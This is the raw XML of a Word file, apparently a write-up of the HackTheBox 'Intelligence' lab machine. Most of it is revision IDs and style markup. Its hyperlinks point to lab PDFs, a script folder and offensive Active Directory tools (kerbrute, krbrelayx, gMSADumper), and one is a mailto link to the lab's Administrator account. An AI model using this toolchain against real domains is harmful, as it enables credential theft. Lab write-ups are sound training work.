    <w:rsid w:val="001D766D"/>
    <w:rsid w:val="001F61A9"/>
    <w:rsid w:val="00215392"/>
    <w:rsid w:val="00221504"/>
    <w:rsid w:val="002241FD"/>
    <w:rsid w:val="00227B96"/>
    <w:rsid w:val="00233C39"/>
    <w:rsid w:val="002571F3"/>
    <w:rsid w:val="00274B18"/>
    <w:rsid w:val="0027547E"/>
    <w:rsid w:val="00295A51"/>
    <w:rsid w:val="003140A5"/>
    <w:rsid w:val="00341883"/>
    <w:rsid w:val="003534CF"/>
    <w:rsid w:val="00355C4A"/>
    <w:rsid w:val="00357297"/>
    <w:rsid w:val="00380FFF"/>
    <w:rsid w:val="00386177"/>
    <w:rsid w:val="0038642F"/>
    <w:rsid w:val="00392563"/>
    <w:rsid w:val="003A0FA8"/>
    <w:rsid w:val="0040078A"/>
    <w:rsid w:val="00423F90"/>
    <w:rsid w:val="00424691"/>
    <w:rsid w:val="0042524D"/>
    <w:rsid w:val="004505B9"/>
    <w:rsid w:val="00451D6C"/>
    <w:rsid w:val="004847F4"/>
    <w:rsid w:val="00497A91"/>
    <w:rsid w:val="004A2615"/>
    <w:rsid w:val="004D4D00"/>
    <w:rsid w:val="004E3D79"/>
    <w:rsid w:val="005132A0"/>
    <w:rsid w:val="00515C0A"/>
    <w:rsid w:val="00516E9D"/>
    <w:rsid w:val="00517ADD"/>
    <w:rsid w:val="00522DF3"/>
    <w:rsid w:val="0054300A"/>
    <w:rsid w:val="00585B42"/>
    <w:rsid w:val="005934B2"/>
    <w:rsid w:val="005A11AB"/>
    <w:rsid w:val="005A2267"/>
    <w:rsid w:val="005B480A"/>
    <w:rsid w:val="005C5569"/>
    <w:rsid w:val="00613ABB"/>
    <w:rsid w:val="006242F0"/>
    <w:rsid w:val="006465D9"/>
    <w:rsid w:val="006527D7"/>
    <w:rsid w:val="00662C48"/>
    <w:rsid w:val="0068182F"/>
    <w:rsid w:val="00684E66"/>
    <w:rsid w:val="006B5193"/>
    <w:rsid w:val="006C5D59"/>
    <w:rsid w:val="00703B53"/>
    <w:rsid w:val="00707070"/>
    <w:rsid w:val="00746E0C"/>
    <w:rsid w:val="00761120"/>
    <w:rsid w:val="007732C6"/>
    <w:rsid w:val="00780D93"/>
    <w:rsid w:val="007A1042"/>
    <w:rsid w:val="007B7629"/>
    <w:rsid w:val="007E13D7"/>
    <w:rsid w:val="008021F9"/>
    <w:rsid w:val="00811457"/>
    <w:rsid w:val="00820B9D"/>
    <w:rsid w:val="00841DB4"/>
    <w:rsid w:val="008572A5"/>
    <w:rsid w:val="00891F71"/>
    <w:rsid w:val="008E14C3"/>
    <w:rsid w:val="009353A6"/>
    <w:rsid w:val="00940A09"/>
    <w:rsid w:val="0095257A"/>
    <w:rsid w:val="00954011"/>
    <w:rsid w:val="00957355"/>
    <w:rsid w:val="00961343"/>
    <w:rsid w:val="00966640"/>
    <w:rsid w:val="00975AD7"/>
    <w:rsid w:val="009B25D8"/>
    <w:rsid w:val="009B5CA2"/>
    <w:rsid w:val="009D4821"/>
    <w:rsid w:val="009F0E3F"/>
    <w:rsid w:val="009F6376"/>
    <w:rsid w:val="00A01C5A"/>
    <w:rsid w:val="00A12944"/>
    <w:rsid w:val="00A159A4"/>
    <w:rsid w:val="00A15B8E"/>
    <w:rsid w:val="00A303DA"/>
    <w:rsid w:val="00A3074F"/>
    <w:rsid w:val="00A611E4"/>
    <w:rsid w:val="00A67069"/>
    <w:rsid w:val="00A81C9B"/>
    <w:rsid w:val="00AF6CB5"/>
    <w:rsid w:val="00B02C0F"/>
    <w:rsid w:val="00B114BF"/>
    <w:rsid w:val="00B32944"/>
    <w:rsid w:val="00B37DAD"/>
    <w:rsid w:val="00B76966"/>
    <w:rsid w:val="00B8355D"/>
    <w:rsid w:val="00B840BF"/>
    <w:rsid w:val="00B9268E"/>
    <w:rsid w:val="00B96CC0"/>
    <w:rsid w:val="00BD0433"/>
    <w:rsid w:val="00BD56E0"/>
    <w:rsid w:val="00BD71AE"/>
    <w:rsid w:val="00BD7692"/>
    <w:rsid w:val="00BE76D1"/>
    <w:rsid w:val="00BF028F"/>
    <w:rsid w:val="00BF3393"/>
    <w:rsid w:val="00BF4441"/>
    <w:rsid w:val="00C12596"/>
    <w:rsid w:val="00C76FFB"/>
    <w:rsid w:val="00C90BF1"/>
    <w:rsid w:val="00CA3724"/>
    <w:rsid w:val="00CB4FC8"/>
    <w:rsid w:val="00CD0F54"/>
    <w:rsid w:val="00CD1D5D"/>
    <w:rsid w:val="00CD42DB"/>
    <w:rsid w:val="00CF25D9"/>
    <w:rsid w:val="00CF4410"/>
    <w:rsid w:val="00D10A33"/>
    <w:rsid w:val="00D45958"/>
    <w:rsid w:val="00D52EC5"/>
    <w:rsid w:val="00D97634"/>
    <w:rsid w:val="00D97D59"/>
    <w:rsid w:val="00DA45C6"/>
    <w:rsid w:val="00DC2A30"/>
    <w:rsid w:val="00E06AC6"/>
    <w:rsid w:val="00E11ECA"/>
    <w:rsid w:val="00E25312"/>
    <w:rsid w:val="00E43826"/>
    <w:rsid w:val="00EB76E9"/>
    <w:rsid w:val="00EC6B7C"/>
    <w:rsid w:val="00ED6DF0"/>
    <w:rsid w:val="00EF74B7"/>
    <w:rsid w:val="00F11805"/>
    <w:rsid w:val="00F1523C"/>
    <w:rsid w:val="00F4202F"/>
    <w:rsid w:val="00F4451E"/>
    <w:rsid w:val="00F6253E"/>
    <w:rsid w:val="00F66CB2"/>
    <w:rsid w:val="00F70EA1"/>
    <w:rsid w:val="00FA4CFF"/>
    <w:rsid w:val="00FB6FE2"/>
    <w:rsid w:val="00FC00E7"/>
    <w:rsid w:val="00FC1B42"/>
    <w:rsid w:val="00FC6A45"/>
    <w:rsid w:val="00FE0503"/>
    <w:rsid w:val="00FE635D"/>
    <w:rsid w:val="00FE7FD5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025C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{366F72D0-11CF-47E4-8D7B-7D2A4A43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3F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3A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57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B51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40"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0096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640"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003A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F9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7Rocky/HackTheBox-scripts/tree/main/Machines/Intelligence/reqPdf.go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hyperlink" Target="http://intelligence.htb/" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ropnop/kerbrute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dirkjanm/krbrelayx.git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7.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/micahvandeusen/gMSADumper.git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github.com/7Rocky/HackTheBox-scripts/tree/main/Machines/Intelligence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://intelligence.htb/documents/2020-01-01-upload.pdf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hyperlink" Target="https://github.com/micahvandeusen/gMSADumper" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:intelligence.htb/Administrator@dc.intelligence.htb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intelligence.htb/documents/2020-12-15-upload.pdf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github.com/7Rocky/HackTheBox-scripts/tree/main/Machines/Intelligence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github.com/micahvandeusen/gMSADumper" TargetMode="External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yperlink" Target="http://intelligence.htb/documents/2020-01-01-upload.pdf" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://intelligence.htb/documents/2020-12-15-upload.pdf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68DA-7834-4601-B8D2-C8A87B1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dixit</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>saksham dixit</cp:lastModifiedBy>
  <cp:revision>326</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-11-25T11:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-11-28T11:26:00Z</dcterms:modified>
</cp:coreProperties>
</file>